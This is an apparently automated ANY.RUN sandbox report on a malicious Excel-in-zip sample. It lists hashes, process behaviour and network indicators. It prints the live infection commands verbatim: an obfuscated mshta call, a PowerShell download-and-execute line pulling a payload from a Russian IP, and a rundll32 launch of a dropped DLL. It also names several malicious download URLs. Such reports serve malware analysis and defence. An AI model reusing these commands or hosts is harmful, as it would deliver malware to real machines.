File name:

6542736497475584.zip

Full analysis: https://app.any.run/tasks/e1365859-26f1-4588-8ea0-e4d9861db20c
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: January 24, 2022, 18:42:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

41DCE4BF4B0E97F8BA74A39EC5F6AF6D

SHA1:

695FE514CE4A2BFA6673BE92E1280C3CE53BD44A

SHA256:

FA10943E223888F489E69486B2EF48403B09281B21405BFE53034D4C5E307E99

SSDEEP:

3072:OH5UU3rGD6NFYHWgkVq8phCi/OGTRd/D8Ce:OHOUS+YHOL1/vfL9e

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3028)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3028)

    • Executes PowerShell scripts

      • mshta.exe (PID: 3532)

  • SUSPICIOUS

    • Reads the computer name

      • WinRAR.exe (PID: 3104)
      • mshta.exe (PID: 3532)
      • powershell.exe (PID: 3116)

    • Checks supported languages

      • WinRAR.exe (PID: 3104)
      • mshta.exe (PID: 3532)
      • cmd.exe (PID: 1408)
      • powershell.exe (PID: 3116)
      • cmd.exe (PID: 4064)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 1408)

    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 3532)

    • Reads Environment values

      • powershell.exe (PID: 3116)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3116)

    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 4064)

  • INFO

    • Creates files in the user directory

      • EXCEL.EXE (PID: 3028)

    • Manual execution by user

      • EXCEL.EXE (PID: 3028)

    • Reads the computer name

      • EXCEL.EXE (PID: 3028)

    • Reads internet explorer settings

      • mshta.exe (PID: 3532)

    • Checks Windows Trust Settings

      • powershell.exe (PID: 3116)

    • Checks supported languages

      • EXCEL.EXE (PID: 3028)
      • rundll32.exe (PID: 1564)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3028)

    • Reads settings of System Certificates

      • powershell.exe (PID: 3116)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 45236b922fe0452378bcbc300f48a2aae3cdd17a03fbb9411a36e6540e700086
ZipUncompressedSize: 118616
ZipCompressedSize: 105378
ZipCRC: 0x3c2aaca4
ZipModifyDate: 1980:00:00 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs excel.exe no specs cmd.exe no specs mshta.exe powershell.exe rundll32.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1408cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\cmd.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1564C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\SysWow64\rundll32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
3028"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3104"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\6542736497475584.zip"C:\Program Files\WinRAR\WinRAR.exeExplorer.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3116"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
3532mshta http://0x5cff39c3/sec/se1.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\iertutil.dll
4064"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
7 847
Read events
7 712
Write events
123
Delete events
12

Modification events

(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3104) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\6542736497475584.zip
(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3104) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
Executable files
0
Suspicious files
8
Text files
3
Unknown types
3

Dropped files

PID
Process
Filename
Type
3028EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR7EC2.tmp.cvr
MD5:
SHA256:
3104WinRAR.exeC:\Users\admin\Desktop\45236b922fe0452378bcbc300f48a2aae3cdd17a03fbb9411a36e6540e700086document
MD5:
SHA256:
3028EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:
SHA256:
3116powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:
SHA256:
3116powershell.exeC:\Users\Public\Documents\ssd.dllhtml
MD5:
SHA256:
3116powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:
SHA256:
3532mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\se1[1].htmbinary
MD5:
SHA256:
3028EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\45236b922fe0452378bcbc300f48a2aae3cdd17a03fbb9411a36e6540e700086.xlsm.LNKlnk
MD5:
SHA256:
3116powershell.exeC:\Users\admin\AppData\Local\Temp\il3az4m2.zck.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3116powershell.exeC:\Users\admin\AppData\Local\Temp\TarC6B9.tmpcat
MD5:D99661D0893A52A0700B8AE68457351A
SHA256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
17
DNS requests
15
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3116
powershell.exe
GET
13.231.8.92:80
http://ntust-arch-2021-api.monoame.com/licenses/e74DJx6t/
JP
suspicious
3116
powershell.exe
GET
200
92.255.57.195:80
http://92.255.57.195/sec/se1.png
RU
text
1.05 Kb
malicious
3116
powershell.exe
GET
404
103.28.37.151:80
http://vnvoron.xyz/cgi-bin/AiWOYIHrf2i/
VN
html
337 b
suspicious
3532
mshta.exe
GET
200
92.255.57.195:80
http://92.255.57.195/sec/se1.html
RU
binary
10.7 Kb
malicious
3116
powershell.exe
GET
200
104.21.59.15:80
http://quranthemepark.com/wp-content/OaIz2gBtm/
US
html
4.22 Kb
malicious
3116
powershell.exe
GET
301
87.249.38.253:80
http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
RU
html
169 b
malicious
3116
powershell.exe
GET
404
135.181.9.38:80
http://alruwayuh.com/V7CFVVFY/9ZMNqV/
CA
html
1.21 Kb
malicious
3116
powershell.exe
GET
200
8.248.119.254:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?181e3ac71feb58b8
US
compressed
59.9 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3116
powershell.exe
92.255.57.195:80
Telecom SP Ltd
RU
malicious
3116
powershell.exe
104.21.59.15:80
quranthemepark.com
Cloudflare Inc
US
malicious
3116
powershell.exe
103.28.37.151:80
vnvoron.xyz
NhanHoa Software company
VN
suspicious
3116
powershell.exe
139.162.171.21:443
kaartinen.org
Linode, LLC
DE
unknown
3116
powershell.exe
188.114.97.7:443
hrlinkedasia.com
Cloudflare Inc
US
malicious
3116
powershell.exe
13.231.8.92:80
ntust-arch-2021-api.monoame.com
Amazon.com, Inc.
JP
suspicious
3116
powershell.exe
135.181.9.38:80
alruwayuh.com
CA
malicious
3116
powershell.exe
34.70.177.225:443
wordpress15.aftershipdemo.com
US
unknown
3116
powershell.exe
159.138.139.161:443
yjhgov.vip
US
unknown
3116
powershell.exe
8.248.119.254:80
ctldl.windowsupdate.com
Level 3 Communications, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
seven-lines.com
  • 87.249.38.253
malicious
quranthemepark.com
  • 104.21.59.15
  • 172.67.167.147
malicious
vnvoron.xyz
  • 103.28.37.151
suspicious
kaartinen.org
  • 139.162.171.21
unknown
ctldl.windowsupdate.com
  • 8.248.119.254
  • 67.27.233.254
  • 8.241.78.254
  • 8.253.207.121
  • 67.27.157.254
whitelisted
hrlinkedasia.com
  • 188.114.97.7
  • 188.114.96.7
malicious
ntust-arch-2021-api.monoame.com
  • 13.231.8.92
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared
customtshirt.sogoflowers.com
malicious
alruwayuh.com
  • 135.181.9.38
malicious

Threats

PID
Process
Class
Message
3116
powershell.exe
Potentially Bad Traffic
ET INFO Request to .XYZ Domain with Minimal Headers
3116
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
3116
powershell.exe
A Network Trojan was detected
AV POLICY CloudFlare Anti-Phishing Protection Warning in HTML Inbound
3116
powershell.exe
Generic Protocol Command Decode
SURICATA STREAM CLOSEWAIT FIN out of window
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
6542736497475584.zip